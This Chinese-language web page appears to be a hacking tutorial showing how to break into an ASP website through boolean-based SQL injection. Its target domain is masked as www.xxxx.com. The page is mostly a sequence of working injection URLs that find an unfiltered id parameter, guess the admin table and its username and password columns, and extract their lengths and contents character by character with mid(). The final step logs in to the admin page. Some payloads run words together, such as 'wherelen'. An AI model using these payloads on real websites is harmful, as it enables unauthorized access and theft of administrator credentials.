<table width="100%" height="100%" cellspacing="0" cellpadding="0" border="0"><tbody>
<tr valign="top">
<td colspan="4"><br /></td></tr>
<tr valign="top">
<td height="100%" style="" colspan="4"><span id="yuyuzi">
<p> 目标:<a target="_blank" href="http://www.xxxx.com/">www.xxxx.com</a><br /> <br />
打开:<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a>在其后面加'为<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47'">http://www.xxxx.com/wz/list.asp?id=47'</a><br />出错!ID没有过滤。<br />
★好!现在的步骤是:<br />1 猜管理员帐号表<br />2 猜相应表中的用户的字段名以及密码的字段名。<br />3 猜出用户名的长度和密码的长度<br />4
猜出用户和密码<br />5 找到管理页面进入管理</p>
<p> ★猜管理员的表:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin)'//min(id)<br /> 返回表中ID最小值<br />
返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。<br /> <br /> ★猜用户的字段名:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where user='qqq')<br /> 返回错误信息,表示没有user这个用户段名<br />
再来!~~~http://www.xxxx.com/wz/list.asp?id=47 and 1=(select min(id) from admin
where username='qqq')<br />
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username这个字段,只是用户名不是qqq</p>
<p> ★猜密码的字段名:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where passwd='qqq')<br /> 返回错误信息表示没有passwd这个密码字段名。<br /> 再来:<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where password='qqq')<br />
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是qqq<br /> <br />
★猜用户字段名长度:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)>5)<br /> 正确<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)<10)<br /> 正确<br /> 用户名长度大于5小于10<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)=7)<br /> 呵``` 用户名长度为7位</p>
<p> ★猜密码长度<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)>5)<br /> 正确<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)<10)<br /> 正确<br /> 密码长度也是大于5小于10<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)=7)<br /> 呵``` 密码长度为7位<br /> <br /> ★猜用户名<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wheremid(username,1,1)='q') <br /> 用户名第一个字母是:q<br />
猜用户名第二位:http://www.xxxx.com/wz/list.asp?id=47 and 1=(select min(id) from admin
wheremid(username,2,1)='a')<br /> 以此类推!</p>
<p> ★现在来猜密码:猜密码跟猜用户名一样!<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wheremid(password,1,1)='q') <br /> <br /> ★猜完后来到管理页面:<br /><a target="_blank" href="http://www.xxxx.com/wz/admin.asp">http://www.xxxx.com/wz/admin.asp</a></p></span></td></tr></tbody></table>
